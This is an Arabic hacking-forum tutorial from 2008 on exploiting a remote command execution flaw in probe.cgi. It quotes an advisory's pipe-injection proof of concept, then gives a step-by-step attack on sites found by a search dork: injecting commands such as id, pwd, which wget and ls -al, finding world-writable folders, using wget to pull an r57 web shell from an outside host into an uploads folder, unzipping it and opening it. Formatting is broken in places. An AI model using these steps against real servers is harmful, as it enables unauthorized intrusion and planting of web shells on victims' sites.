منتدي الغندورللبرامج
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتدي الغندورللبرامج

مركز البرامج و الحمايه والتصميمات والفتو شوب والهكر(هذا المنتدي منظومه عربيه للاختراقات العالميه)
 
دخولالتسجيلأحدث الصورالبوابةالرئيسية

 

 التعامل مع ثغرات Remote command exucetion

اذهب الى الأسفل 
كاتب الموضوعرسالة
الدكتور
رئيس مجلس الاداره
رئيس مجلس الاداره
الدكتور


عدد الرسائل : 368
الدوله : التعامل مع ثغرات Remote command exucetion Egyption
المهنه : التعامل مع ثغرات Remote command exucetion Profes10
هوايتك : التعامل مع ثغرات Remote command exucetion Sports10
نقاط العضو :
التعامل مع ثغرات Remote command exucetion Left_bar_bleue100 / 100100 / 100التعامل مع ثغرات Remote command exucetion Right_bar_bleue

وسام : التعامل مع ثغرات Remote command exucetion Mdir2008
تاريخ التسجيل : 16/01/2008

التعامل مع ثغرات Remote command exucetion Empty
مُساهمةموضوع: التعامل مع ثغرات Remote command exucetion   التعامل مع ثغرات Remote command exucetion Icon_minitimeالإثنين مايو 19, 2008 5:31 pm

السلام عليكم ورحمة الله

راح نشرح عمل نوع من الثغرات وهي ما تسمى

(( Remote command exucetion ))

وهي تسمح لك برفع شل او باكدور ,,,,,,الخ

اول حاجه لازم يكون عندك شل مرفوع بموقعك او احد المواقع,,,

طيب خلينا نجيب ثغره ونطبق عنونها كذا

Probe.cgi Remote Command Execution

يعني بملف Probe.cgi فيه ثغره رموت كومند حلو ...طيب خلونا نشوف الاكسبلويت


كود PHP:
Authors ....... spher3 (spher3 at fatalimpulse dot net)
Date .......... 04-07-
2005
Product
....... probe.
cgi
Type
..........
Remote Command Execution

o Info
:
================
That '''''''''''' is used to open file '.dat'
.

o Vulnerable Code
:
================
..
23
[...]
24 $old = $query->param('olddat'
);
25
[...]
..
..
34
[...]
35 open (VF, "$olddat"
);
36
[...]
..

(
24) At this line, the cgi param 'olddat' is associated to one database
.
This variable isnt checked by anyone matching,
so you can open
all file that you want
. (35) At this line the ''''''''''''
open the file
that you had chosen
. With pipe `|
`
is possible to execute arbitrary code on the ''''''''l
.


o Proof of concept
:
================

http:
//the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|
uid=99(www) gid=99(www
)




لو تقراء باعلى موضح لك الملف ونوع الثغره,,,,,طيب احنا عوزين الاستثمار

استثمارها هنا بالسطر


كود PHP:
http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|



the-vuln.site.org.<<===الموقع المستهدف وهو افتراضي

cgi-bin<<===مجلد السيقيبين

probe.cgi<<===الملف المصاب

olddat<<===مكان الاصابه داخل الملف ومو شرط نفس الاسم ممكن يتغير
===============

طيب نبغى نعرف كيف عملها اوكي

اول تسوي بحث بالطريقه هذي

allinurl:probe.cgi

او اي طريقة تحب

لنفرض اننا حصل موقع

WWW.???.com/cgi.bin/probe.cgi?grid=ThaiGrid

كويس اول حاجه نضع

كود PHP:
|id|




بيطلع بالشكل


كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|id|




واعطيه انتر بيظهر لك مثلا كذا



كود PHP:
uid=99(www) gid=99(www)




هذا صفتك بالسيرفر

طيب نبغى ننعرفع ممكاننا وين ضع مكان الاي دي

pwd


كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|pwd|




بيطلع معك مثلا
كود PHP:
/home/.???/cgi.bin




طيب نبغى نشوف مسموح لينا نرفع ملف والا لا؟

ضع مكان الاي دي


which wget


بالشكل


كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|which wget|




اذا ضهر لك كدا


كود PHP:
/؟؟؟/؟؟؟/wget



وعلامة الاستفاهم متغير يعني اهم شي ويقت تظهر فاعرف انك الوضع زي الفل

يعني مسموح لك ترفع ملف انبسط ياعم

طيب نبغى نعرف التصاريح للمجلدات والملفات عشان نشوف وين المسوح لينا بالرفع

لو ترجع احنا قلنا مكاننا وين هنا


كود PHP:
/home/.???/cgi.bin


طيب احنا نبغى نخرج من مجلد cgi.bin للديكويتري الرئيسي حلو

نضع مكان الاي دي

cd /home/.???/;pwd


يعني بيكون بالشكل


كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;pwd|




الان بيرجعنا الى

كود PHP:
home/.???/



حلو الان نبغى نشوف المجلدات والمفات و التصريحات بالامر

كود:
;ls%20-al

يصبح معنا هكدا بدات اتعب ههههههههه

كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;ls%20-al|




بتظهر لك ملفات ومجلدات الموقع واما مهم تصريحاتهم

انت ابحث عن الملجلد اللي له التصريح

drwxrwxrwx

لنفرض انك حصلت امام مجلد الصور او uploads

اولا لازم نخش عليه تعمل



home/.???/uploads/;pwd


كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/;pwd|




حلو بيكون وضعك بالشكل

home/.???/uploads/

يعني داخل مجلد uploads

الان كل معليك رفع الشل طبعا لك شل مرفوع باحد المواقع يعني رابط شيلك


www.XXX.com/r57''''''''l.zip

وتبغى ترفعه على الموقع المخترقه بالشكل


كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/wget www.XXX.com/r57''''''''l.zip*|



واعطيه انتر بيظهر لك

r57''''''''l.zip


طيب نبغى نفك الضغط عنه بالامر unzip


كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/unzip r57''''''''l.zip*|




وديلو انتر بيطلع معك

r57''''''''l.phpوالف التعامل مع ثغرات Remote command exucetion 0091 خش وافتحه بالمتصفح وتمتع وبيكون الرابط

WWW.???.com/uploads/r57''''''''l.php

عموما ياجماعه الموضع كله انك تعرف كيف تتحرك وترفع ,,, وراح تكون الثغرات اسهل منها ما فيه

اتمنى ان يعجبكم الشرح

و لا تبخلو علينا بالردود
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://elgandour.ahlamontada.com
 
التعامل مع ثغرات Remote command exucetion
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدي الغندورللبرامج :: قسم الحمايه من الهكر :: منتدي جديد الثغرات وطرق الحمايه منها-
انتقل الى: